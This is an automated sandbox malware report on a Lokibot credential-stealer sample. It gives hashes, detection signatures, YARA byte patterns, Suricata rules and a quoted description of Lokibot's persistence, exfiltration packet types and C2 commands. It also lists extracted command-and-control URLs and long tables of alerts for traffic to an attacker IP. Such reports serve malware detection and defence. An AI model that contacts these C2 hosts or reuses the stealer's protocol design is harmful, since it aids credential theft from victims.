Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0yWVteGq5T.exe

Overview

General Information

Sample name:0yWVteGq5T.exe
renamed because original name is a hash value
Original sample name:c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c.exe
Analysis ID:1571285
MD5:d7ede461fd6438cfae2cba59fa1e07e9
SHA1:b6f2dbb0d2ae969583a96b8463ccc561324c7b27
SHA256:c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c
Tags:exeuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 0yWVteGq5T.exe (PID: 3416 cmdline: "C:\Users\user\Desktop\0yWVteGq5T.exe" MD5: D7EDE461FD6438CFAE2CBA59FA1E07E9)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
SourceRuleDescriptionAuthorStrings
0yWVteGq5T.exeJoeSecurity_LokibotYara detected LokibotJoe Security
    0yWVteGq5T.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      0yWVteGq5T.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0yWVteGq5T.exeWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        0yWVteGq5T.exeWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
          SourceRuleDescriptionAuthorStrings
          00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000000.2104706247.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
            00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 10 entries
                SourceRuleDescriptionAuthorStrings
                0.0.0yWVteGq5T.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                  0.0.0yWVteGq5T.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                    0.2.0yWVteGq5T.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                      0.2.0yWVteGq5T.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                        0.0.0yWVteGq5T.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                          Click to see the 11 entries
                          No Sigma rule has matched
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:40.997887+010020243121A Network Trojan was detected192.168.2.64970794.156.177.4180TCP
                          2024-12-09T08:51:43.112123+010020243121A Network Trojan was detected192.168.2.64970894.156.177.4180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:39.566096+010020253811Malware Command and Control Activity Detected192.168.2.64970794.156.177.4180TCP
                          2024-12-09T08:51:41.388226+010020253811Malware Command and Control Activity Detected192.168.2.64970894.156.177.4180TCP
                          2024-12-09T08:51:43.494161+010020253811Malware Command and Control Activity Detected192.168.2.64971094.156.177.4180TCP
                          2024-12-09T08:51:45.316994+010020253811Malware Command and Control Activity Detected192.168.2.64971294.156.177.4180TCP
                          2024-12-09T08:51:46.997946+010020253811Malware Command and Control Activity Detected192.168.2.64971394.156.177.4180TCP
                          2024-12-09T08:51:48.825174+010020253811Malware Command and Control Activity Detected192.168.2.64971594.156.177.4180TCP
                          2024-12-09T08:51:50.500278+010020253811Malware Command and Control Activity Detected192.168.2.64972194.156.177.4180TCP
                          2024-12-09T08:51:52.709648+010020253811Malware Command and Control Activity Detected192.168.2.64972694.156.177.4180TCP
                          2024-12-09T08:51:54.371881+010020253811Malware Command and Control Activity Detected192.168.2.64973294.156.177.4180TCP
                          2024-12-09T08:51:56.186859+010020253811Malware Command and Control Activity Detected192.168.2.64973694.156.177.4180TCP
                          2024-12-09T08:52:00.874032+010020253811Malware Command and Control Activity Detected192.168.2.64975594.156.177.4180TCP
                          2024-12-09T08:52:02.924152+010020253811Malware Command and Control Activity Detected192.168.2.64975794.156.177.4180TCP
                          2024-12-09T08:52:07.593802+010020253811Malware Command and Control Activity Detected192.168.2.64977394.156.177.4180TCP
                          2024-12-09T08:52:09.406949+010020253811Malware Command and Control Activity Detected192.168.2.64977594.156.177.4180TCP
                          2024-12-09T08:52:11.232353+010020253811Malware Command and Control Activity Detected192.168.2.64978194.156.177.4180TCP
                          2024-12-09T08:52:13.423061+010020253811Malware Command and Control Activity Detected192.168.2.64978794.156.177.4180TCP
                          2024-12-09T08:52:15.682605+010020253811Malware Command and Control Activity Detected192.168.2.64979394.156.177.4180TCP
                          2024-12-09T08:52:17.325150+010020253811Malware Command and Control Activity Detected192.168.2.64979994.156.177.4180TCP
                          2024-12-09T08:52:22.154447+010020253811Malware Command and Control Activity Detected192.168.2.64981194.156.177.4180TCP
                          2024-12-09T08:52:23.972500+010020253811Malware Command and Control Activity Detected192.168.2.64981894.156.177.4180TCP
                          2024-12-09T08:52:25.653268+010020253811Malware Command and Control Activity Detected192.168.2.64982394.156.177.4180TCP
                          2024-12-09T08:52:27.621178+010020253811Malware Command and Control Activity Detected192.168.2.64982894.156.177.4180TCP
                          2024-12-09T08:52:29.310465+010020253811Malware Command and Control Activity Detected192.168.2.64983394.156.177.4180TCP
                          2024-12-09T08:52:31.142639+010020253811Malware Command and Control Activity Detected192.168.2.64983694.156.177.4180TCP
                          2024-12-09T08:52:32.844275+010020253811Malware Command and Control Activity Detected192.168.2.64984194.156.177.4180TCP
                          2024-12-09T08:52:34.672995+010020253811Malware Command and Control Activity Detected192.168.2.64984894.156.177.4180TCP
                          2024-12-09T08:52:36.479932+010020253811Malware Command and Control Activity Detected192.168.2.64985494.156.177.4180TCP
                          2024-12-09T08:52:38.214537+010020253811Malware Command and Control Activity Detected192.168.2.64985994.156.177.4180TCP
                          2024-12-09T08:52:39.872509+010020253811Malware Command and Control Activity Detected192.168.2.64986394.156.177.4180TCP
                          2024-12-09T08:52:41.529353+010020253811Malware Command and Control Activity Detected192.168.2.64986794.156.177.4180TCP
                          2024-12-09T08:52:43.346921+010020253811Malware Command and Control Activity Detected192.168.2.64987394.156.177.4180TCP
                          2024-12-09T08:52:45.154565+010020253811Malware Command and Control Activity Detected192.168.2.64987994.156.177.4180TCP
                          2024-12-09T08:52:46.983185+010020253811Malware Command and Control Activity Detected192.168.2.64988594.156.177.4180TCP
                          2024-12-09T08:52:48.658727+010020253811Malware Command and Control Activity Detected192.168.2.64988894.156.177.4180TCP
                          2024-12-09T08:52:51.358825+010020253811Malware Command and Control Activity Detected192.168.2.64989694.156.177.4180TCP
                          2024-12-09T08:52:53.027579+010020253811Malware Command and Control Activity Detected192.168.2.64990094.156.177.4180TCP
                          2024-12-09T08:52:55.108776+010020253811Malware Command and Control Activity Detected192.168.2.64990694.156.177.4180TCP
                          2024-12-09T08:52:56.790419+010020253811Malware Command and Control Activity Detected192.168.2.64991194.156.177.4180TCP
                          2024-12-09T08:52:58.611498+010020253811Malware Command and Control Activity Detected192.168.2.64991794.156.177.4180TCP
                          2024-12-09T08:53:00.419701+010020253811Malware Command and Control Activity Detected192.168.2.64992494.156.177.4180TCP
                          2024-12-09T08:53:02.244480+010020253811Malware Command and Control Activity Detected192.168.2.64992994.156.177.4180TCP
                          2024-12-09T08:53:04.064839+010020253811Malware Command and Control Activity Detected192.168.2.64993594.156.177.4180TCP
                          2024-12-09T08:53:05.731669+010020253811Malware Command and Control Activity Detected192.168.2.64993794.156.177.4180TCP
                          2024-12-09T08:53:07.405384+010020253811Malware Command and Control Activity Detected192.168.2.64994394.156.177.4180TCP
                          2024-12-09T08:53:09.232229+010020253811Malware Command and Control Activity Detected192.168.2.64994994.156.177.4180TCP
                          2024-12-09T08:53:10.889178+010020253811Malware Command and Control Activity Detected192.168.2.64995494.156.177.4180TCP
                          2024-12-09T08:53:12.702697+010020253811Malware Command and Control Activity Detected192.168.2.64996094.156.177.4180TCP
                          2024-12-09T08:53:14.518189+010020253811Malware Command and Control Activity Detected192.168.2.64996294.156.177.4180TCP
                          2024-12-09T08:53:16.345760+010020253811Malware Command and Control Activity Detected192.168.2.64996894.156.177.4180TCP
                          2024-12-09T08:53:18.018612+010020253811Malware Command and Control Activity Detected192.168.2.64997394.156.177.4180TCP
                          2024-12-09T08:53:19.857048+010020253811Malware Command and Control Activity Detected192.168.2.64997894.156.177.4180TCP
                          2024-12-09T08:53:21.514620+010020253811Malware Command and Control Activity Detected192.168.2.64998494.156.177.4180TCP
                          2024-12-09T08:53:23.627769+010020253811Malware Command and Control Activity Detected192.168.2.64999094.156.177.4180TCP
                          2024-12-09T08:53:25.479289+010020253811Malware Command and Control Activity Detected192.168.2.64999494.156.177.4180TCP
                          2024-12-09T08:53:27.294180+010020253811Malware Command and Control Activity Detected192.168.2.65000094.156.177.4180TCP
                          2024-12-09T08:53:32.251367+010020253811Malware Command and Control Activity Detected192.168.2.65001494.156.177.4180TCP
                          2024-12-09T08:53:34.465271+010020253811Malware Command and Control Activity Detected192.168.2.65002094.156.177.4180TCP
                          2024-12-09T08:53:39.296364+010020253811Malware Command and Control Activity Detected192.168.2.65003294.156.177.4180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:45.047544+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649710TCP
                          2024-12-09T08:51:46.735993+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649712TCP
                          2024-12-09T08:51:48.558599+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649713TCP
                          2024-12-09T08:51:50.229157+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649715TCP
                          2024-12-09T08:51:52.441798+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649721TCP
                          2024-12-09T08:51:54.105409+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649726TCP
                          2024-12-09T08:51:55.923388+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649732TCP
                          2024-12-09T08:52:00.604257+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649736TCP
                          2024-12-09T08:52:02.430253+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649755TCP
                          2024-12-09T08:52:07.334848+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649757TCP
                          2024-12-09T08:52:09.148041+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649773TCP
                          2024-12-09T08:52:10.967759+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649775TCP
                          2024-12-09T08:52:13.150006+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649781TCP
                          2024-12-09T08:52:15.380232+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649787TCP
                          2024-12-09T08:52:17.055207+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649793TCP
                          2024-12-09T08:52:21.883707+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649799TCP
                          2024-12-09T08:52:23.706862+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649811TCP
                          2024-12-09T08:52:25.383816+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649818TCP
                          2024-12-09T08:52:27.211831+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649823TCP
                          2024-12-09T08:52:29.025072+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649828TCP
                          2024-12-09T08:52:30.869216+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649833TCP
                          2024-12-09T08:52:32.583829+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649836TCP
                          2024-12-09T08:52:34.403160+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649841TCP
                          2024-12-09T08:52:36.222043+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649848TCP
                          2024-12-09T08:52:37.937696+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649854TCP
                          2024-12-09T08:52:39.617090+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649859TCP
                          2024-12-09T08:52:41.271992+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649863TCP
                          2024-12-09T08:52:43.084245+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649867TCP
                          2024-12-09T08:52:44.895864+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649873TCP
                          2024-12-09T08:52:46.712064+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649879TCP
                          2024-12-09T08:52:48.387942+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649885TCP
                          2024-12-09T08:52:51.098178+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649888TCP
                          2024-12-09T08:52:52.770279+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649896TCP
                          2024-12-09T08:52:54.851047+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649900TCP
                          2024-12-09T08:52:56.515239+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649906TCP
                          2024-12-09T08:52:58.343275+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649911TCP
                          2024-12-09T08:53:00.162703+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649917TCP
                          2024-12-09T08:53:01.975965+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649924TCP
                          2024-12-09T08:53:03.799477+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649929TCP
                          2024-12-09T08:53:05.461784+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649935TCP
                          2024-12-09T08:53:07.133139+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649937TCP
                          2024-12-09T08:53:08.967742+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649943TCP
                          2024-12-09T08:53:10.632378+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649949TCP
                          2024-12-09T08:53:12.442925+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649954TCP
                          2024-12-09T08:53:14.257210+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649960TCP
                          2024-12-09T08:53:16.072199+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649962TCP
                          2024-12-09T08:53:17.742970+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649968TCP
                          2024-12-09T08:53:19.572995+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649973TCP
                          2024-12-09T08:53:21.253640+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649978TCP
                          2024-12-09T08:53:23.356465+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649984TCP
                          2024-12-09T08:53:25.215864+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649990TCP
                          2024-12-09T08:53:27.037389+010020254831A Network Trojan was detected94.156.177.4180192.168.2.649994TCP
                          2024-12-09T08:53:31.852429+010020254831A Network Trojan was detected94.156.177.4180192.168.2.650000TCP
                          2024-12-09T08:53:34.199827+010020254831A Network Trojan was detected94.156.177.4180192.168.2.650014TCP
                          2024-12-09T08:53:39.024901+010020254831A Network Trojan was detected94.156.177.4180192.168.2.650020TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:32.799150+010020243131Malware Command and Control Activity Detected192.168.2.65003294.156.177.4180TCP
                          2024-12-09T08:51:44.928264+010020243131Malware Command and Control Activity Detected192.168.2.64971094.156.177.4180TCP
                          2024-12-09T08:51:46.616642+010020243131Malware Command and Control Activity Detected192.168.2.64971294.156.177.4180TCP
                          2024-12-09T08:51:48.439293+010020243131Malware Command and Control Activity Detected192.168.2.64971394.156.177.4180TCP
                          2024-12-09T08:51:50.109741+010020243131Malware Command and Control Activity Detected192.168.2.64971594.156.177.4180TCP
                          2024-12-09T08:51:52.322198+010020243131Malware Command and Control Activity Detected192.168.2.64972194.156.177.4180TCP
                          2024-12-09T08:51:53.986106+010020243131Malware Command and Control Activity Detected192.168.2.64972694.156.177.4180TCP
                          2024-12-09T08:51:55.804149+010020243131Malware Command and Control Activity Detected192.168.2.64973294.156.177.4180TCP
                          2024-12-09T08:52:00.480412+010020243131Malware Command and Control Activity Detected192.168.2.64973694.156.177.4180TCP
                          2024-12-09T08:52:02.310802+010020243131Malware Command and Control Activity Detected192.168.2.64975594.156.177.4180TCP
                          2024-12-09T08:52:07.215515+010020243131Malware Command and Control Activity Detected192.168.2.64975794.156.177.4180TCP
                          2024-12-09T08:52:09.028698+010020243131Malware Command and Control Activity Detected192.168.2.64977394.156.177.4180TCP
                          2024-12-09T08:52:10.848504+010020243131Malware Command and Control Activity Detected192.168.2.64977594.156.177.4180TCP
                          2024-12-09T08:52:13.030024+010020243131Malware Command and Control Activity Detected192.168.2.64978194.156.177.4180TCP
                          2024-12-09T08:52:15.247122+010020243131Malware Command and Control Activity Detected192.168.2.64978794.156.177.4180TCP
                          2024-12-09T08:52:16.935958+010020243131Malware Command and Control Activity Detected192.168.2.64979394.156.177.4180TCP
                          2024-12-09T08:52:21.764409+010020243131Malware Command and Control Activity Detected192.168.2.64979994.156.177.4180TCP
                          2024-12-09T08:52:23.587495+010020243131Malware Command and Control Activity Detected192.168.2.64981194.156.177.4180TCP
                          2024-12-09T08:52:25.264366+010020243131Malware Command and Control Activity Detected192.168.2.64981894.156.177.4180TCP
                          2024-12-09T08:52:27.091553+010020243131Malware Command and Control Activity Detected192.168.2.64982394.156.177.4180TCP
                          2024-12-09T08:52:28.905374+010020243131Malware Command and Control Activity Detected192.168.2.64982894.156.177.4180TCP
                          2024-12-09T08:52:30.743567+010020243131Malware Command and Control Activity Detected192.168.2.64983394.156.177.4180TCP
                          2024-12-09T08:52:32.430394+010020243131Malware Command and Control Activity Detected192.168.2.64983694.156.177.4180TCP
                          2024-12-09T08:52:34.283694+010020243131Malware Command and Control Activity Detected192.168.2.64984194.156.177.4180TCP
                          2024-12-09T08:52:36.102690+010020243131Malware Command and Control Activity Detected192.168.2.64984894.156.177.4180TCP
                          2024-12-09T08:52:37.818426+010020243131Malware Command and Control Activity Detected192.168.2.64985494.156.177.4180TCP
                          2024-12-09T08:52:39.497811+010020243131Malware Command and Control Activity Detected192.168.2.64985994.156.177.4180TCP
                          2024-12-09T08:52:41.152631+010020243131Malware Command and Control Activity Detected192.168.2.64986394.156.177.4180TCP
                          2024-12-09T08:52:42.964742+010020243131Malware Command and Control Activity Detected192.168.2.64986794.156.177.4180TCP
                          2024-12-09T08:52:44.776414+010020243131Malware Command and Control Activity Detected192.168.2.64987394.156.177.4180TCP
                          2024-12-09T08:52:46.592675+010020243131Malware Command and Control Activity Detected192.168.2.64987994.156.177.4180TCP
                          2024-12-09T08:52:48.268574+010020243131Malware Command and Control Activity Detected192.168.2.64988594.156.177.4180TCP
                          2024-12-09T08:52:50.978504+010020243131Malware Command and Control Activity Detected192.168.2.64988894.156.177.4180TCP
                          2024-12-09T08:52:52.651034+010020243131Malware Command and Control Activity Detected192.168.2.64989694.156.177.4180TCP
                          2024-12-09T08:52:54.731708+010020243131Malware Command and Control Activity Detected192.168.2.64990094.156.177.4180TCP
                          2024-12-09T08:52:56.395944+010020243131Malware Command and Control Activity Detected192.168.2.64990694.156.177.4180TCP
                          2024-12-09T08:52:58.223873+010020243131Malware Command and Control Activity Detected192.168.2.64991194.156.177.4180TCP
                          2024-12-09T08:53:00.043307+010020243131Malware Command and Control Activity Detected192.168.2.64991794.156.177.4180TCP
                          2024-12-09T08:53:01.856477+010020243131Malware Command and Control Activity Detected192.168.2.64992494.156.177.4180TCP
                          2024-12-09T08:53:03.676877+010020243131Malware Command and Control Activity Detected192.168.2.64992994.156.177.4180TCP
                          2024-12-09T08:53:05.342475+010020243131Malware Command and Control Activity Detected192.168.2.64993594.156.177.4180TCP
                          2024-12-09T08:53:07.013704+010020243131Malware Command and Control Activity Detected192.168.2.64993794.156.177.4180TCP
                          2024-12-09T08:53:08.848305+010020243131Malware Command and Control Activity Detected192.168.2.64994394.156.177.4180TCP
                          2024-12-09T08:53:10.512942+010020243131Malware Command and Control Activity Detected192.168.2.64994994.156.177.4180TCP
                          2024-12-09T08:53:12.323602+010020243131Malware Command and Control Activity Detected192.168.2.64995494.156.177.4180TCP
                          2024-12-09T08:53:14.137920+010020243131Malware Command and Control Activity Detected192.168.2.64996094.156.177.4180TCP
                          2024-12-09T08:53:15.952241+010020243131Malware Command and Control Activity Detected192.168.2.64996294.156.177.4180TCP
                          2024-12-09T08:53:17.623736+010020243131Malware Command and Control Activity Detected192.168.2.64996894.156.177.4180TCP
                          2024-12-09T08:53:19.453534+010020243131Malware Command and Control Activity Detected192.168.2.64997394.156.177.4180TCP
                          2024-12-09T08:53:21.134282+010020243131Malware Command and Control Activity Detected192.168.2.64997894.156.177.4180TCP
                          2024-12-09T08:53:23.236388+010020243131Malware Command and Control Activity Detected192.168.2.64998494.156.177.4180TCP
                          2024-12-09T08:53:25.096431+010020243131Malware Command and Control Activity Detected192.168.2.64999094.156.177.4180TCP
                          2024-12-09T08:53:26.917838+010020243131Malware Command and Control Activity Detected192.168.2.64999494.156.177.4180TCP
                          2024-12-09T08:53:31.731754+010020243131Malware Command and Control Activity Detected192.168.2.65000094.156.177.4180TCP
                          2024-12-09T08:53:34.080464+010020243131Malware Command and Control Activity Detected192.168.2.65001494.156.177.4180TCP
                          2024-12-09T08:53:38.905570+010020243131Malware Command and Control Activity Detected192.168.2.65002094.156.177.4180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T08:51:32.799150+010020243181Malware Command and Control Activity Detected192.168.2.65003294.156.177.4180TCP
                          2024-12-09T08:51:44.928264+010020243181Malware Command and Control Activity Detected192.168.2.64971094.156.177.4180TCP
                          2024-12-09T08:51:46.616642+010020243181Malware Command and Control Activity Detected192.168.2.64971294.156.177.4180TCP
                          2024-12-09T08:51:48.439293+010020243181Malware Command and Control Activity Detected192.168.2.64971394.156.177.4180TCP
                          2024-12-09T08:51:50.109741+010020243181Malware Command and Control Activity Detected192.168.2.64971594.156.177.4180TCP
                          2024-12-09T08:51:52.322198+010020243181Malware Command and Control Activity Detected192.168.2.64972194.156.177.4180TCP
                          2024-12-09T08:51:53.986106+010020243181Malware Command and Control Activity Detected192.168.2.64972694.156.177.4180TCP
                          2024-12-09T08:51:55.804149+010020243181Malware Command and Control Activity Detected192.168.2.64973294.156.177.4180TCP
                          2024-12-09T08:52:00.480412+010020243181Malware Command and Control Activity Detected192.168.2.64973694.156.177.4180TCP
                          2024-12-09T08:52:02.310802+010020243181Malware Command and Control Activity Detected192.168.2.64975594.156.177.4180TCP
                          2024-12-09T08:52:07.215515+010020243181Malware Command and Control Activity Detected192.168.2.64975794.156.177.4180TCP
                          2024-12-09T08:52:09.028698+010020243181Malware Command and Control Activity Detected192.168.2.64977394.156.177.4180TCP
                          2024-12-09T08:52:10.848504+010020243181Malware Command and Control Activity Detected192.168.2.64977594.156.177.4180TCP
                          2024-12-09T08:52:13.030024+010020243181Malware Command and Control Activity Detected192.168.2.64978194.156.177.4180TCP
                          2024-12-09T08:52:15.247122+010020243181Malware Command and Control Activity Detected192.168.2.64978794.156.177.4180TCP
                          2024-12-09T08:52:16.935958+010020243181Malware Command and Control Activity Detected192.168.2.64979394.156.177.4180TCP
                          2024-12-09T08:52:21.764409+010020243181Malware Command and Control Activity Detected192.168.2.64979994.156.177.4180TCP
                          2024-12-09T08:52:23.587495+010020243181Malware Command and Control Activity Detected192.168.2.64981194.156.177.4180TCP
                          2024-12-09T08:52:25.264366+010020243181Malware Command and Control Activity Detected192.168.2.64981894.156.177.4180TCP
                          2024-12-09T08:52:27.091553+010020243181Malware Command and Control Activity Detected192.168.2.64982394.156.177.4180TCP
                          2024-12-09T08:52:28.905374+010020243181Malware Command and Control Activity Detected192.168.2.64982894.156.177.4180TCP
                          2024-12-09T08:52:30.743567+010020243181Malware Command and Control Activity Detected192.168.2.64983394.156.177.4180TCP
                          2024-12-09T08:52:32.430394+010020243181Malware Command and Control Activity Detected192.168.2.64983694.156.177.4180TCP
